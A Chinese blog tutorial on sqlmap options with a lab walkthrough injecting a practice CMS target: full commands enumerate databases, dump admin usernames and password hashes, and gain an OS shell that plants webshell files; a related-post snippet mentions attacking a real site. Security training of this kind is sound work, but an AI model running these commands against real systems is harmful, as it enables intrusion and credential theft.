SqlMap的使用以及对cms文件管理系统的实践

已于 2023-07-23 15:48:06 修改
阅读量193 收藏
点赞数
分类专栏: 靶机 渗透测试工具 文章标签: 数据库 安全性测试
于 2023-06-17 17:56:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42589016/article/details/131262533
版权

SqlMap

SqlMap参数

  1. 参数及意义
    -u								检测注入点(url)
--batch							所有选项默认
--dbs							列出所有数据库名
--current-user					当前连接数据库用户的名字
--current-db					当前数据库的名字
-D 数据库名						指定目标数据库为"数据库名"
--tables						列出数据库所有的表名
-T	表名							指定目标表名为"表名"
--columns						列出所有的字段名
-C	字段名1,字段名2				指定目标字段
--dump							列出字段内容
-r								从文件中读取HTTP请求
--os-shell						在特定情况下(下面讲解),可以直接获取目标系统的Shell
--level	3						等级1~5,Sqlmap的测试深度,level等级越高检测越详细,但会在数据库内插入大量脏数据
--risk							等级1~3,Sqlmap语句的复杂度,等级越高语句会测的越复杂,有些地方可能对正常的语句不生效,需要有特殊的语句才能触发的时候才有用,等级越高,就越容易测出漏洞

SqlMap的注意项

  1. 参数 -u 参数 -r的区别

    • 参数-u后跟待测试的url,参数-r后跟的时访问的请求头
    • 使用-u会有明显的数据特征
      在这里插入图片描述在这里插入图片描述

  2. 使用 level等级过高会对目标数据库造成很多脏数据

  3. 参数–os-shell的使用条件很苛刻

    • 必须要知道绝对路径
    • 要有读写权限
    • mysql.ini中要有secure-file-priv=

CMS文件管理系统的自动化注入

  1. 打开Kali,登录靶场在这里插入图片描述

  2. 找到注入点
    在这里插入图片描述

  3. 打开代理和BurpSuite进行抓包
    在这里插入图片描述

  4. 再访问一遍,找BurpSuite抓到的请求头
    在这里插入图片描述

  5. 将请求头保存到head.txt中
    注:尽量用vim,不要用kali自带的编辑器,容易导致格式错误
    在这里插入图片描述

  6. 跑SqlMap获取数据库sqlmap -r head.txt -p 'id' --risk=3 --level=1 --batch --proxy http://127.0.0.1:8080 --dbs
    注:参数会在补充中同一讲解
    在这里插入图片描述我们可以从下图看到,其实sqlmap也是进行了各种测试手法,和手动测试大同小异,只是自动化去做了
    在这里插入图片描述

  7. 获取表名sqlmap -r head.txt -p 'id' --risk=3 --level=1 --batch --proxy http://127.0.0.1:8080 -D cms --tables

  8. 在这里插入图片描述

  9. 获取字段名qlmap -r head.txt -p 'id' --risk=3 --level=1 --batch --proxy http://127.0.0.1:8080 -D cms -T cms_users --columns
    在这里插入图片描述

  10. 脱库跑路sqlmap -r head.txt -p 'id' --risk=3 --level=1 --batch --proxy http://127.0.0.1:8080 -D cms -T cms_users -C password,username --dump,可以看到sqlmap很贴心的把MD5给解密了出来
    在这里插入图片描述

  11. 获得webshellsqlmap -r head.txt -p 'id' --risk=3 --level=1 --proxy http://127.0.0.1:8080 --os-shell

  12. 在这里插入图片描述
    可以看到,SqlMap在我的文件路径下增加了两个木马文件 在这里插入图片描述

【架构实践】软件架构设计最佳实践
AI天才研究院
03-10 2万+
3、软件架构的设计过程;(4)结合多个案例,分析关键功能需求,质量属性需求,约束对架构的影响(项目错误的架构,导致不能最终验收)6、SOA架构、企业集成系统架构、企业门户架构的设计实践;(5)表现层的设计框架(Struts,JSF,WebWork,ASP.net,PHP等)(4)ORM、Hibernate,JPA与SQLMap(iBatis),LINQ设计思想。(2)EAI参考模型:业务模式、概念模式、逻辑模式、物理模式和实现模式。(2)架构设计中的数据库存取(ORM,底层存取,SQLMap等选择)
[网络安全自学篇] 四十八.Cracer第八期——(1)安全术语、Web渗透流程、Windows基础、注册表及黑客常用DOS命令
热门推荐
杨秀璋的专栏
02-21 2万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了微软证书漏洞(CVE-2020-0601),并详细讲解了Windows验证机制、可执行文件签名复现及HTTPS劫持。本文将分享另一个主题——Cracer教程,第一篇文章将详细讲解安全术语、Web渗透流程和Windows基础、注册表及黑客常用DOS命令。基础性文章,希望对您有所帮助。
基于phpcmssqlmap工具注入
qq_44060093的博客
08-20 609
SQL注入攻击是一种常用的攻击网站手段。受影响的网站系统: ASP+Access、ASP+SQLServer、PHP+MySQL、PHP+Apache等。 实验原理 SQLMAP是一个开放源码的渗透测试工具,它可以自动探测和利用SQL注入漏洞来接管数据库服务器。它配备了一个强大的探测引擎,为最终渗透测试人员提供很多的功能,可以拖库,可以访问底层的文件系统,还可以通过带外连接执行操作系统上的命令。 SQLMAP支持五种SQL注入技术: (1)基于布尔值得注入,基于时间的盲注,基于错误的盲注,UNION查询和s
SQLMap获取cms 后台管理员账密
QYbkx974的博客
11-07 331
SQLMap是一款专注于sQLv 的工具,堪称神器。SQLmap 基于Python 语言编写的命令行工具,集成在KALI中。
SQLmap使用教程图文教程(非常详细)从零基础入门到精通,看完这一篇就够了。
xnxqwzy的博客
09-06 1623
SQLmap是一款「自动化」SQL注入工具,kali自带。路径 /usr/share/sqlmap打开终端,输入sqlmap,出现以下界面,就说明SQLmap「可用」。1、检测「注入点」2、查看所有「数据库」3、查看当前使用数据库4、查看「数据表」5、查看「字段」6、查看「数据」
注入工具--sqlmap
ve9etable的博客
07-09 503
SQLMap 请参考连接文章了解并学习手动SQL注入2020年了,还要学习SQL注入吗? 手动检测一个URL还比较简单,但是要是面对一堆URL呢?就像一大波僵尸来袭,一个豌豆射手恐怕不行了,为了不让僵尸吃掉你的脑子,我们得升级,先把豌豆射手升级成机枪射手试试 SQL注入工具的出现恰如雪中送炭,目前这类工具受欢迎的很多,但SQLMap却在其中总能排第一 SQLMap是一个开放源码的自动化渗透测试工具,可以自动检测和利用SQL注入漏洞,是我们的一大帮手,如果URL中存在注入漏洞,它就可以从数据库中提
sqlmap使用详解
聚鼎安全
01-07 451
参考: sqlmap 详解 Sqlmap使用详解
CMS指纹识别技术及应用
weixin_34216196的博客
05-11 3785
CMS指纹识别技术及应用simeon在web***过程中,对目标网站的指纹识别比较关键,通过工具或者手工来识别CMS系统是自建还是二次开发,还是直接使用公开的CMS程序至关重要。通过获取的这些信息来决定后续***的思路和策略。CMS指纹识别是***测试环节一个非常重要的阶段,是信息收集中的一个关键环节。1.1.1指纹识别技术简介及思路1. 指纹识别技术组件是网络空间最小单元,Web应用程序、数据库...
Linux系统中自动安装Bug赏金猎人工具的脚本
17. CMSmap: CMSmap专注于扫描CMS(内容管理系统)安装,以识别安全漏洞。 18. GitTools: 这是一组工具,用于从git存储库中恢复隐藏和被遗忘的文件,这对于识别存储库中敏感信息非常有用。 19. Weevely: Weevely是...
CMSmap
03-13
CMS地图 CMSmap是一个python开源CMS扫描程序,它可以自动检测最流行CMS的安全漏洞。 CMSmap的主要目的是在单个工具中集成针对不同类型CMS的常见漏洞。 目前,CMSmap支持的CMS是WordPress,Joomla,Drupal和Moodle。 请注意,该项目处于早期状态。 因此,您可能会发现错误,缺陷或多功能。 需要您自担风险使用它! 预览 安装 您可以通过克隆GitHub存储库下载最新版本的CMSmap: git clone https://github.com/Dionach/CMSmap 然后,你需要配置edbtype和edbpath在设置cmsmap.conf 。 如果您具有Exploit-db的本地Git存储库,请使用GIT : [exploitdb] edbtype = GIT edbpath = /opt/exploitdb/ 或者,如果您已
hack101ctf writeup
乱七八糟事物储藏室
02-14 568
hackone 靶场通关记录
渗透之——SQLMap的用法+谷歌黑客语法
冰河的专栏
12-09 5146
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/84927643 SQLMap的用法记录 ******************基本步骤*************** sqlmap.py -u "http://192.168.109.139/news?id=1" --current-user #获取当前用户名称 sqlmap...
CTF/CTF练习平台-成绩查询【sqlmap post方法】
Sp4rkW的博客
08-30 5123
原题内容: 快来查查成绩吧 http://120.24.86.145:8002/chengjidan/ 学习资料: SQLMap中文参数用户手册 sqlmap WAF绕过/tamper详解 这题还是很基本的注入,首先手工尝试 延时五秒显示,结果是和只输入1一样,很明显,这是一个注入点,然后sleep既然是有效果的,不烦试一试sqlmap 这里用到了post方...
sqlmap实例拿站
天元喜羊羊的博客
08-03 2万+
http://www.myhack58.com/Article/html/3/8/2012/35324.htm 目标: http://www.djj.com/yz/cn/videodt.jsp?Videoid=10 此URL为sa权限猪肉一块 用穿山甲不能执行命令 过程如下: 通过访问 http://www.djj .com/login.jsp 得知该站由一
Sqlmap使用及提权
qq_43757105的博客
10-16 9920
目录 一、获取账密 ​二、Sqlmap提权 ​ 一、获取账密 检查注入点,发现存在sql注入 --dbs 检查数据库名 --current-user 当前连接数据库的用户名 --current-db 当前连接数据库的名字 -D "数据库名" 指定目标数据库名 --tables 列出数据库中所有的表名 -T "cms_...
关于SQLMap使用
qq_40806924的博客
08-12 251
SQLMap基本参数 1.如果存在注入点,将会显示Web容器、数据库版本信息。-u 2.读取整个数据库 -u “xxx” --dbs 3.查看当前应用程序所用数据库sqlmap -u “http://XXXXXXX?id=1” --current-dbs 4、列出指定数据库的所有表:sqlmap -u “http://XXXXXXX?id=1” --tables -D “admin” 5、读取指定表中的字段名称:sqlmap -u “http://XXXXXXX?id=1” --columns
比较系统的web安全学习路线
yjwangan的博客
10-27 1423
比较系统的web安全学习路线
Mybatis
最新发布
庸不易的博客
11-15 647
1、定义不同:#{} 预处理:而 ${} 是直接替换2、使用不同:#{} 适用于所有类型的参数匹配;但 ${} 只适用于数值类型。3、安全性不同:#{} 性能高,并且没有安全问题;但 $ {} 存在 SQL 注入的安全问题。4、使用场景不同:当传递的是一个 SQL 关键字 的时候,只能 使用 ${}。当传递的是一个字段,总之,就是需要获取到参数类型 与 内容,只能使用 #{}。(PS:数字类型,#{} 和 ${} 都是可以使用的!5、 ${} 不能用于 模糊匹配查询;
MySQL 8.0特性-自增变量的持久化
myneth的博客
11-13 484
在MySQL 8.0之前,自增主键AUTO_INCREMENT的值如果大于max(primary key)+1,在MySQL重启后,会重置AUTO_INCREMENT=max(primary key)+1,这种现象在某些情况下会导致业务主键冲突或者其他难以发现的问题。下面通过案例来对比不同的版本中自增变量是否持久化。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值